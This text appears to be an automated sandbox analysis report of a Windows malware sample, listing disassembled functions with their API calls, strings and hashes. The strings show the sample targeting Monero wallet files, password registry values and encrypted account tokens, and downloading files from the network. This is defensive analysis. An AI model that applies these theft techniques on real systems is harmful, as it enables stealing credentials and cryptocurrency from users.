                              • Part of subcall function 00608B60: GetSystemTime.KERNEL32(00610E1A,01409EE8,006105AE,?,?,005F13F9,?,0000001A,00610E1A,00000000,?,01408AA0,?,\Monero\wallet.keys,00610E17), ref: 00608B86
                              • Part of subcall function 0060A920: lstrcpy.KERNEL32(00000000,?), ref: 0060A972
                              • Part of subcall function 0060A920: lstrcat.KERNEL32(00000000), ref: 0060A982
                            • CopyFileA.KERNEL32(?,00000000,00000001), ref: 005F1465
                              • Part of subcall function 0060A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0060A7E6
                              • Part of subcall function 005F99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005F99EC
                              • Part of subcall function 005F99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 005F9A11
                              • Part of subcall function 005F99C0: LocalAlloc.KERNEL32(00000040,?), ref: 005F9A31
                              • Part of subcall function 005F99C0: ReadFile.KERNEL32(000000FF,?,00000000,005F148F,00000000), ref: 005F9A5A
                              • Part of subcall function 005F99C0: LocalFree.KERNEL32(005F148F), ref: 005F9A90
                              • Part of subcall function 005F99C0: CloseHandle.KERNEL32(000000FF), ref: 005F9A9A
                            • DeleteFileA.KERNEL32(00000000), ref: 005F14EF
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                            • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                            • API String ID: 3478931302-218353709
                            • Opcode ID: 8c7cdbfd809d1f9d4b03f62a74d1a64af7e7f939173b8a5330de562458b10b11
                            • Instruction ID: 815c5d96aaca3641d0d2ee6bb7bc9e4cef24aa614c2390caa2fb0cdb98d9b83c
                            • Opcode Fuzzy Hash: 8c7cdbfd809d1f9d4b03f62a74d1a64af7e7f939173b8a5330de562458b10b11
                            • Instruction Fuzzy Hash: 925145B199021957CB59FB60DD96FEE733DAF54300F4045ACB60A620C1EE345B85CF99
                            Function 005F75D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 005F72D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 005F733A
                              • Part of subcall function 005F72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 005F73B1
                              • Part of subcall function 005F72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 005F740D
                              • Part of subcall function 005F72D0: GetProcessHeap.KERNEL32(00000000,?), ref: 005F7452
                              • Part of subcall function 005F72D0: HeapFree.KERNEL32(00000000), ref: 005F7459
                            • lstrcat.KERNEL32(00000000,006117FC), ref: 005F7606
                            • lstrcat.KERNEL32(00000000,00000000), ref: 005F7648
                            • lstrcat.KERNEL32(00000000, : ), ref: 005F765A
                            • lstrcat.KERNEL32(00000000,00000000), ref: 005F768F
                            • lstrcat.KERNEL32(00000000,00611804), ref: 005F76A0
                            • lstrcat.KERNEL32(00000000,00000000), ref: 005F76D3
                            • lstrcat.KERNEL32(00000000,00611808), ref: 005F76ED
                            • task.LIBCPMTD ref: 005F76FB
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                            • String ID: :
                            • API String ID: 2677904052-3653984579
                            • Opcode ID: 56e11a472ef9f857103d384961acf515fa9ef3cb699b21deee0eff0ca43467ce
                            • Instruction ID: 9edfc294f424477184dab46a67c3335889faba86e45a2dd033f95f421e7af064
                            • Opcode Fuzzy Hash: 56e11a472ef9f857103d384961acf515fa9ef3cb699b21deee0eff0ca43467ce
                            • Instruction Fuzzy Hash: 9E31407190110EDFCB48EBB4DC9ADFF7B79BB98301B144518F202A72A1DA39E946CB51
                            Function 005F60A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0060A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0060A7E6
                              • Part of subcall function 005F47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 005F4839
                              • Part of subcall function 005F47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 005F4849
                            • InternetOpenA.WININET(00610DF7,00000001,00000000,00000000,00000000), ref: 005F610F
                            • StrCmpCA.SHLWAPI(?,0140E430), ref: 005F6147
                            • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 005F618F
                            • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 005F61B3
                            • InternetReadFile.WININET(?,?,00000400,?), ref: 005F61DC
                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 005F620A
                            • CloseHandle.KERNEL32(?,?,00000400), ref: 005F6249
                            • InternetCloseHandle.WININET(?), ref: 005F6253
                            • InternetCloseHandle.WININET(00000000), ref: 005F6260
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                            • String ID:
                            • API String ID: 2507841554-0
                            • Opcode ID: 360b408929b53ddea4c514fef5589f82133a11c326e85bba387d9d1558290bd1
                            • Instruction ID: 22f7582b40c5d0bb88c830e46ad3aab15ece90f034c50021ca030bd7e04be81e
                            • Opcode Fuzzy Hash: 360b408929b53ddea4c514fef5589f82133a11c326e85bba387d9d1558290bd1
                            • Instruction Fuzzy Hash: 47516DB1A4020CABDB24DFA0DC49BEE7BB9FB44701F108498A645A71C1DB786A85CF95
                            Function 005F72D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON
                            Download Yara Rule
                            APIs
                            • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 005F733A
                            • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 005F73B1
                            • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 005F740D
                            • GetProcessHeap.KERNEL32(00000000,?), ref: 005F7452
                            • HeapFree.KERNEL32(00000000), ref: 005F7459
                            • task.LIBCPMTD ref: 005F7555
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$EnumFreeOpenProcessValuetask
                            • String ID: Password
                            • API String ID: 775622407-3434357891
                            • Opcode ID: 8885ea2b2e4b3da49fb0ec112830b6945ce729fa69bad93ff1d8c9cad258edb4
                            • Instruction ID: a83c4f3efa9ba1676a0d82b9466ab781ab48d76415609782a3b588b0910d0d68
                            • Opcode Fuzzy Hash: 8885ea2b2e4b3da49fb0ec112830b6945ce729fa69bad93ff1d8c9cad258edb4
                            • Instruction Fuzzy Hash: 10613CB590415D9BDB24DB50CC45FEABBB8BF48300F0085E9E689A6181DF745BC9CF90
                            Function 005FBA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0060A740: lstrcpy.KERNEL32(00610E17,00000000), ref: 0060A788
                              • Part of subcall function 0060A9B0: lstrlen.KERNEL32(?,01408AA0,?,\Monero\wallet.keys,00610E17), ref: 0060A9C5
                              • Part of subcall function 0060A9B0: lstrcpy.KERNEL32(00000000), ref: 0060AA04
                              • Part of subcall function 0060A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0060AA12
                              • Part of subcall function 0060A920: lstrcpy.KERNEL32(00000000,?), ref: 0060A972
                              • Part of subcall function 0060A920: lstrcat.KERNEL32(00000000), ref: 0060A982
                              • Part of subcall function 0060A8A0: lstrcpy.KERNEL32(?,00610E17), ref: 0060A905
                              • Part of subcall function 0060A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0060A7E6
                            • lstrlen.KERNEL32(00000000), ref: 005FBC9F
                              • Part of subcall function 00608E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00608E52
                            • StrStrA.SHLWAPI(00000000,AccountId), ref: 005FBCCD
                            • lstrlen.KERNEL32(00000000), ref: 005FBDA5
                            • lstrlen.KERNEL32(00000000), ref: 005FBDB9
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                            • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                            • API String ID: 3073930149-1079375795
                            • Opcode ID: 9b6c40f6b6f6abc634ac2be5d21fd83252abd8394083035d022e1d926b72d3e7
                            • Instruction ID: 3ff4f86f99b6e6d09dc01411ed8cf5f072a6f603309a7d81ac25a8f8c6d09ff0
                            • Opcode Fuzzy Hash: 9b6c40f6b6f6abc634ac2be5d21fd83252abd8394083035d022e1d926b72d3e7
                            • Instruction Fuzzy Hash: 27B14C719502089BDB88EBE0CD96EEF733ABF54340F40456CF506A60D1EF346A49CBA6
                            Function 00606770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitProcess$DefaultLangUser
                            • String ID: *
                            • API String ID: 1494266314-163128923
                            • Opcode ID: 848fb2fac9eb9209b0aecf141d695ba695f80152009aafae3368f88c2f5f3c27
                            • Instruction ID: eb0f604c4bbadf939b582e1dceea921fb01f1e2a05d6c8701988b396840fce2e
                            • Opcode Fuzzy Hash: 848fb2fac9eb9209b0aecf141d695ba695f80152009aafae3368f88c2f5f3c27
                            • Instruction Fuzzy Hash: BBF0583098820DEFD348AFE0E949B6DBB70FB44703F040598F68986390EA704B519B96
                            Function 005F4FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 005F4FCA
                            • RtlAllocateHeap.NTDLL(00000000), ref: 005F4FD1
                            • InternetOpenA.WININET(00610DDF,00000000,00000000,00000000,00000000), ref: 005F4FEA
                            • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 005F5011
                            • InternetReadFile.WININET(?,?,00000400,00000000), ref: 005F5041
                            • InternetCloseHandle.WININET(?), ref: 005F50B9
                            • InternetCloseHandle.WININET(?), ref: 005F50C6
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                            • String ID:
                            • API String ID: 3066467675-0
                            • Opcode ID: 2faf3933eaaaf4e00fc1101e77a93990d480231c9eabcce2cbbb9f397aaf9c1a
                            • Instruction ID: 8de311c277e8cc6680f2e5113f8e65968a882e3c853bde2d98b2cb6da19f2b03
                            • Opcode Fuzzy Hash: 2faf3933eaaaf4e00fc1101e77a93990d480231c9eabcce2cbbb9f397aaf9c1a
                            • Instruction Fuzzy Hash: 133108B4A4021CABDB24CF54DC89BDDB7B4FB48704F1085D8EB09A7281DB746AC58F99
                            Function 00608100 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 67memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0140DAD0,00000000,?,00610E2C,00000000,?,00000000), ref: 00608130
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00608137
                            • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00608158
                            • wsprintfA.USER32 ref: 006081AC
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                            • String ID: %d MB$@
                            • API String ID: 2922868504-3474575989
                            • Opcode ID: 10467b20a0b2c33087e30529e7ed164e7ef85de750abd5bb5761eb1ace71e799
                            • Instruction ID: 3dc7a1d52430364ef75a221077ceba1e4c64e71edb192f0e0659d6a28901b2a4
                            • Opcode Fuzzy Hash: 10467b20a0b2c33087e30529e7ed164e7ef85de750abd5bb5761eb1ace71e799
                            • Instruction Fuzzy Hash: 9D2129B1A44208ABDB04DFD4DC49FAFBBB9FB44B10F104619F605BB2C0D77859018BA5
                            Function 006083DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                            Download Yara Rule
                            APIs
                            • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00608426
                            • wsprintfA.USER32 ref: 00608459
                            • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0060847B
                            • RegCloseKey.ADVAPI32(00000000), ref: 0060848C
                            • RegCloseKey.ADVAPI32(00000000), ref: 00608499
                              • Part of subcall function 0060A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0060A7E6
                            • RegQueryValueExA.ADVAPI32(00000000,0140D800,00000000,000F003F,?,00000400), ref: 006084EC
                            • lstrlen.KERNEL32(?), ref: 00608501
                            • RegQueryValueExA.ADVAPI32(00000000,0140D950,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00610B34), ref: 00608599
                            • RegCloseKey.ADVAPI32(00000000), ref: 00608608
                            • RegCloseKey.ADVAPI32(00000000), ref: 0060861A
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                            • String ID: %s\%s
                            • API String ID: 3896182533-4073750446
                            • Opcode ID: 69bb6c04da47586ac539bd00a22a1a2df19d376f837f64d135fa03b4df03a6a7
                            • Instruction ID: 5317406ae6352b1a0d4f67dd7e808374d4cd7548fb7e05abed18857819cffa97
                            • Opcode Fuzzy Hash: 69bb6c04da47586ac539bd00a22a1a2df19d376f837f64d135fa03b4df03a6a7
                            • Instruction Fuzzy Hash: 0F21E77195021CAFDB68DB54DC85FE9B3B9FB88700F00C598A649A6280DF71AA85CFD4
                            Function 00607690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006076A4
